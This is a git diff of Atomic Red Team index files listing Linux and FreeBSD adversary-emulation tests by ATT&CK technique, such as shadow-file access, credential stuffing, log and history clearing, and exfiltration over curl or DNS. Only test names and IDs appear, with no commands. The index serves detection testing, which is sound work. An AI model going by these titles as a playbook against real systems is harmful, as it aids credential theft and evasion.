(freebsd),922b1080-0b95-42b0-9585-b9a5ea0af044,sh credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh +credential-access,T1552.004,Unsecured Credentials: Private Keys,8,Copy the users GnuPG directory with rsync (freebsd),b05ac39b-515f-48e9-88e9-2f141b5bcad0,sh credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh +credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash +credential-access,T1110.004,Brute Force: Credential Stuffing,3,SSH Credential Stuffing From FreeBSD,a790d50e-7ebf-48de-8daa-d9367e0911d4,sh credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash +credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",2,Access /etc/master.passwd (Local),5076874f-a8e6-4077-8ace-9e5ab54114a5,sh credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",3,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",4,"Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,sh credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh @@ -248,30 +336,42 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh +discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh +discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash +discovery,T1007,System Service Discovery,4,System Service Discovery - service,b2e1c734-7336-40f9-b970-b04731cbaf8a,sh discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash +discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh +discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh +discovery,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash discovery,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash discovery,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash discovery,T1040,Network Sniffing,15,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash +discovery,T1135,Network Share Discovery,3,Network Share Discovery - FreeBSD,77e468a6-3e5c-45a1-9948-c4b5603747cb,sh discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash +discovery,T1082,System Information Discovery,6,FreeBSD VM Check via Kernel Modules,eefe6a49-d88b-41d8-8fc2-b46822da90d3,sh discovery,T1082,System Information Discovery,8,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,sh discovery,T1082,System Information Discovery,12,"Environment variables discovery on freebsd, macos and linux",fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh discovery,T1082,System Information Discovery,25,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh +discovery,T1082,System Information Discovery,26,FreeBSD List Kernel Modules,4947897f-643a-4b75-b3f5-bed6885749f6,sh discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh +discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON Files on FreeBSD,88ca025b-3040-44eb-9168-bd8af22b82fa,sh discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh +discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (freebsd),7625b978-4efd-47de-8744-add270374bee,sh discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash +discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - FreeBSD,a7893624-a3d7-4aed-9676-80498f31820f,sh discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash discovery,T1201,Password Policy Discovery,4,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash discovery,T1201,Password Policy Discovery,5,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash @@ -280,13 +380,16 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,4,Disco discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh +discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - pgrep (FreeBSD),fa96c21c-5fd6-4428-aa28-51a2fbecdbdc,sh discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh +discovery,T1018,Remote System Discovery,14,Remote System Discovery - netstat,d2791d72-b67f-4615-814f-ec824a91f514,sh discovery,T1018,Remote System Discovery,15,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh +discovery,T1046,Network Service Discovery,3,Port Scan Nmap for FreeBSD,f03d59dc-0e3b-428a-baeb-3499552c7048,sh impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh @@ -298,11 +401,14 @@ impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/ma impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - FreeBSD/Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,sh +impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - FreeBSD,7b1cee42-320f-4890-b056-d65c8b884ba5,sh impact,T1529,System Shutdown/Reboot,8,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,sh +impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh execution,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh @@ -316,18 +422,26 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh +execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash +execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash +execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash +execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts,6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables,0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,sh execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +execution,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash +initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash +initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash +initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh @@ -335,3 +449,4 @@ exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c5 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh +exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,9,Python3 http.server (freebsd),57a303a2-0bc6-400d-b144-4f3292920a0b,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 4dd99e2dd8..efb41cdece 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -24,25 +24,25 @@ - T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] - - Atomic Test #2: Malicious PAM rule (freebsd) [freebsd] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) - - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux] - - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux] - - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux] - - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux] + - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos] + - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos] + - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos] + - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos] - Atomic Test #5: chown - Change file or folder ownership and group [macos, linux] - Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux] - - Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux] + - Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos] - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux] - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux] - - Atomic Test #10: chflags - Remove immutable file attribute [freebsd] + - Atomic Test #10: chflags - Remove immutable file attribute [linux] - Atomic Test #11: Chmod through c script [macos, linux] - - Atomic Test #12: Chmod through c script (freebsd) [freebsd] + - Atomic Test #12: Chmod through c script (freebsd) [linux] - Atomic Test #13: Chown through c script [macos, linux] - - Atomic Test #14: Chown through c script (freebsd) [freebsd] + - Atomic Test #14: Chown through c script (freebsd) [linux] - [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -84,11 +84,11 @@ - T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - Atomic Test #1: Sudo usage [macos, linux] - - Atomic Test #2: Sudo usage (freebsd) [freebsd] + - Atomic Test #2: Sudo usage (freebsd) [linux] - Atomic Test #3: Unlimited sudo cache timeout [macos, linux] - - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [freebsd] + - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux] - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux] - - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [freebsd] + - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux] - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) @@ -99,7 +99,7 @@ - T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1093 Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) - - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd] + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - Atomic Test #2: Masquerade as a built-in system executable [windows] - T1600 Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -118,24 +118,24 @@ - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] - - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [freebsd] + - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux] - Atomic Test #3: Detect Virtualization Environment (Windows) [windows] - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos] - Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows] - [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) - Atomic Test #1: rm -rf [macos, linux] - - Atomic Test #2: rm -rf [freebsd] + - Atomic Test #2: rm -rf [linux] - Atomic Test #3: Delete log files using built-in log utility [macos] - Atomic Test #4: Truncate system log files via truncate utility [macos] - - Atomic Test #5: Truncate system log files via truncate utility (freebsd) [freebsd] + - Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux] - Atomic Test #6: Delete log files via cat utility by appending /dev/null or /dev/zero [macos] - - Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [freebsd] + - Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux] - Atomic Test #8: System log file deletion via find utility [macos] - Atomic Test #9: Overwrite macOS system log via echo utility [macos] - - Atomic Test #10: Overwrite FreeBSD system log via echo utility [freebsd] + - Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux] - Atomic Test #11: Real-time system log clearance/deletion [macos] - Atomic Test #12: Delete system log files via unlink utility [macos] - - Atomic Test #13: Delete system log files via unlink utility (freebsd) [freebsd] + - Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux] - Atomic Test #14: Delete system log files using shred utility [macos] - Atomic Test #15: Delete system log files using srm utility [macos] - Atomic Test #16: Delete system log files using OSAScript [macos] @@ -183,21 +183,21 @@ - T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] - - Atomic Test #2: Clear sh history (rm) [freebsd] + - Atomic Test #2: Clear sh history (rm) [linux] - Atomic Test #3: Clear Bash history (echo) [linux] - - Atomic Test #4: Clear sh history (echo) [freebsd] + - Atomic Test #4: Clear sh history (echo) [linux] - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos] - - Atomic Test #6: Clear sh history (cat dev/null) [freebsd] + - Atomic Test #6: Clear sh history (cat dev/null) [linux] - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos] - - Atomic Test #8: Clear sh history (ln dev/null) [freebsd] + - Atomic Test #8: Clear sh history (ln dev/null) [linux] - Atomic Test #9: Clear Bash history (truncate) [linux] - - Atomic Test #10: Clear sh history (truncate) [freebsd] + - Atomic Test #10: Clear sh history (truncate) [linux] - Atomic Test #11: Clear history of a bunch of shells [linux, macos] - - Atomic Test #12: Clear history of a bunch of shells (freebsd) [freebsd] + - Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux] - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos] - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos] - Atomic Test #15: Disable Bash History Logging with SSH -T [linux] - - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [freebsd] + - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux] - Atomic Test #17: Prevent Powershell History Logging [windows] - Atomic Test #18: Clear Powershell History by Deleting History File [windows] - Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows] @@ -209,12 +209,12 @@ - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] - Atomic Test #2: Certutil Rename and Decode [windows] - - Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos] - - Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos] + - Atomic Test #3: Base64 decoding with Python [linux, macos] + - Atomic Test #4: Base64 decoding with Perl [linux, macos] - Atomic Test #5: Base64 decoding with shell utilities [linux, macos] - - Atomic Test #6: Base64 decoding with shell utilities (freebsd) [freebsd] - - Atomic Test #7: FreeBSD b64encode Shebang in CLI [freebsd] - - Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos] + - Atomic Test #6: Base64 decoding with shell utilities (freebsd) [linux] + - Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux] + - Atomic Test #8: Hex decoding with shell utilities [linux, macos] - Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos] - Atomic Test #10: XOR decoding and command execution using Python [linux, macos] - [T1562 Impair Defenses](../../T1562/T1562.md) @@ -256,10 +256,10 @@ - Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key [windows] - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) - - Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos] - - Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos] - - Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos] - - Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos] + - Atomic Test #1: Set a file's access timestamp [linux, macos] + - Atomic Test #2: Set a file's modification timestamp [linux, macos] + - Atomic Test #3: Set a file's creation timestamp [linux, macos] + - Atomic Test #4: Modify file timestamps using reference file [linux, macos] - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows] - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows] - Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows] @@ -292,11 +292,11 @@ - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows] - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows] - Atomic Test #7: Stop/Start UFW firewall [linux] - - Atomic Test #8: Stop/Start Packet Filter [freebsd] + - Atomic Test #8: Stop/Start Packet Filter [linux] - Atomic Test #9: Stop/Start UFW firewall systemctl [linux] - Atomic Test #10: Turn off UFW logging [linux] - Atomic Test #11: Add and delete UFW firewall rules [linux] - - Atomic Test #12: Add and delete Packet Filter rules [freebsd] + - Atomic Test #12: Add and delete Packet Filter rules [linux] - Atomic Test #13: Edit UFW firewall user.rules file [linux] - Atomic Test #14: Edit UFW firewall ufw.conf file [linux] - Atomic Test #15: Edit UFW firewall sysctl.conf file [linux] @@ -381,8 +381,8 @@ - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows] - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) - - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux] - - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux] + - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos] + - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos] - [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) - Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows] - Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows] @@ -407,15 +407,15 @@ - Atomic Test #2: 